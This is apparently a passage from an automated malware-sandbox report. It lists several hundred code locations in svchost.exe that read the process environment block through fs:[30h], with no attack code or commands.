            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C9179 mov eax, dword ptr fs:[00000030h]2_2_038C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D08D mov eax, dword ptr fs:[00000030h]2_2_0382D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03835096 mov eax, dword ptr fs:[00000030h]2_2_03835096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385D090 mov eax, dword ptr fs:[00000030h]2_2_0385D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385D090 mov eax, dword ptr fs:[00000030h]2_2_0385D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386909C mov eax, dword ptr fs:[00000030h]2_2_0386909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov ecx, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov ecx, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov ecx, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov ecx, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039050D9 mov eax, dword ptr fs:[00000030h]2_2_039050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD0C0 mov eax, dword ptr fs:[00000030h]2_2_038AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD0C0 mov eax, dword ptr fs:[00000030h]2_2_038AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038590DB mov eax, dword ptr fs:[00000030h]2_2_038590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038550E4 mov eax, dword ptr fs:[00000030h]2_2_038550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038550E4 mov ecx, dword ptr fs:[00000030h]2_2_038550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]2_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F903E mov eax, dword ptr fs:[00000030h]2_2_038F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F903E mov eax, dword ptr fs:[00000030h]2_2_038F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F903E mov eax, dword ptr fs:[00000030h]2_2_038F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F903E mov eax, dword ptr fs:[00000030h]2_2_038F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D705E mov ebx, dword ptr fs:[00000030h]2_2_038D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D705E mov eax, dword ptr fs:[00000030h]2_2_038D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B052 mov eax, dword ptr fs:[00000030h]2_2_0385B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B106E mov eax, dword ptr fs:[00000030h]2_2_038B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905060 mov eax, dword ptr fs:[00000030h]2_2_03905060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov ecx, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841070 mov eax, dword ptr fs:[00000030h]2_2_03841070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD070 mov ecx, dword ptr fs:[00000030h]2_2_038AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF78A mov eax, dword ptr fs:[00000030h]2_2_038EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B97A9 mov eax, dword ptr fs:[00000030h]2_2_038B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BF7AF mov eax, dword ptr fs:[00000030h]2_2_038BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BF7AF mov eax, dword ptr fs:[00000030h]2_2_038BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BF7AF mov eax, dword ptr fs:[00000030h]2_2_038BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BF7AF mov eax, dword ptr fs:[00000030h]2_2_038BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BF7AF mov eax, dword ptr fs:[00000030h]2_2_038BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039037B6 mov eax, dword ptr fs:[00000030h]2_2_039037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385D7B0 mov eax, dword ptr fs:[00000030h]2_2_0385D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F7BA mov eax, dword ptr fs:[00000030h]2_2_0382F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038357C0 mov eax, dword ptr fs:[00000030h]2_2_038357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038357C0 mov eax, dword ptr fs:[00000030h]2_2_038357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038357C0 mov eax, dword ptr fs:[00000030h]2_2_038357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383D7E0 mov ecx, dword ptr fs:[00000030h]2_2_0383D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03837703 mov eax, dword ptr fs:[00000030h]2_2_03837703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03835702 mov eax, dword ptr fs:[00000030h]2_2_03835702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03835702 mov eax, dword ptr fs:[00000030h]2_2_03835702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386F71F mov eax, dword ptr fs:[00000030h]2_2_0386F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386F71F mov eax, dword ptr fs:[00000030h]2_2_0386F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF72E mov eax, dword ptr fs:[00000030h]2_2_038EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03833720 mov eax, dword ptr fs:[00000030h]2_2_03833720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384F720 mov eax, dword ptr fs:[00000030h]2_2_0384F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384F720 mov eax, dword ptr fs:[00000030h]2_2_0384F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384F720 mov eax, dword ptr fs:[00000030h]2_2_0384F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F972B mov eax, dword ptr fs:[00000030h]2_2_038F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B73C mov eax, dword ptr fs:[00000030h]2_2_0390B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B73C mov eax, dword ptr fs:[00000030h]2_2_0390B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B73C mov eax, dword ptr fs:[00000030h]2_2_0390B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B73C mov eax, dword ptr fs:[00000030h]2_2_0390B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829730 mov eax, dword ptr fs:[00000030h]2_2_03829730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829730 mov eax, dword ptr fs:[00000030h]2_2_03829730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03865734 mov eax, dword ptr fs:[00000030h]2_2_03865734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383973A mov eax, dword ptr fs:[00000030h]2_2_0383973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383973A mov eax, dword ptr fs:[00000030h]2_2_0383973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843740 mov eax, dword ptr fs:[00000030h]2_2_03843740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843740 mov eax, dword ptr fs:[00000030h]2_2_03843740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843740 mov eax, dword ptr fs:[00000030h]2_2_03843740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903749 mov eax, dword ptr fs:[00000030h]2_2_03903749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B765 mov eax, dword ptr fs:[00000030h]2_2_0382B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B765 mov eax, dword ptr fs:[00000030h]2_2_0382B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B765 mov eax, dword ptr fs:[00000030h]2_2_0382B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B765 mov eax, dword ptr fs:[00000030h]2_2_0382B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B368C mov eax, dword ptr fs:[00000030h]2_2_038B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B368C mov eax, dword ptr fs:[00000030h]2_2_038B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B368C mov eax, dword ptr fs:[00000030h]2_2_038B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B368C mov eax, dword ptr fs:[00000030h]2_2_038B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D6AA mov eax, dword ptr fs:[00000030h]2_2_0382D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D6AA mov eax, dword ptr fs:[00000030h]2_2_0382D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038276B2 mov eax, dword ptr fs:[00000030h]2_2_038276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038276B2 mov eax, dword ptr fs:[00000030h]2_2_038276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038276B2 mov eax, dword ptr fs:[00000030h]2_2_038276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383B6C0 mov eax, dword ptr fs:[00000030h]2_2_0383B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383B6C0 mov eax, dword ptr fs:[00000030h]2_2_0383B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383B6C0 mov eax, dword ptr fs:[00000030h]2_2_0383B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383B6C0 mov eax, dword ptr fs:[00000030h]2_2_0383B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383B6C0 mov eax, dword ptr fs:[00000030h]2_2_0383B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383B6C0 mov eax, dword ptr fs:[00000030h]2_2_0383B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC mov eax, dword ptr fs:[00000030h]2_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC mov eax, dword ptr fs:[00000030h]2_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC mov eax, dword ptr fs:[00000030h]2_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC mov eax, dword ptr fs:[00000030h]2_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF6C7 mov eax, dword ptr fs:[00000030h]2_2_038EF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038616CF mov eax, dword ptr fs:[00000030h]2_2_038616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C36EE mov eax, dword ptr fs:[00000030h]2_2_038C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C36EE mov eax, dword ptr fs:[00000030h]2_2_038C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C36EE mov eax, dword ptr fs:[00000030h]2_2_038C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C36EE mov eax, dword ptr fs:[00000030h]2_2_038C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C36EE mov eax, dword ptr fs:[00000030h]2_2_038C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C36EE mov eax, dword ptr fs:[00000030h]2_2_038C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385D6E0 mov eax, dword ptr fs:[00000030h]2_2_0385D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385D6E0 mov eax, dword ptr fs:[00000030h]2_2_0385D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038636EF mov eax, dword ptr fs:[00000030h]2_2_038636EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ED6F0 mov eax, dword ptr fs:[00000030h]2_2_038ED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03861607 mov eax, dword ptr fs:[00000030h]2_2_03861607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386F603 mov eax, dword ptr fs:[00000030h]2_2_0386F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03833616 mov eax, dword ptr fs:[00000030h]2_2_03833616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03833616 mov eax, dword ptr fs:[00000030h]2_2_03833616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
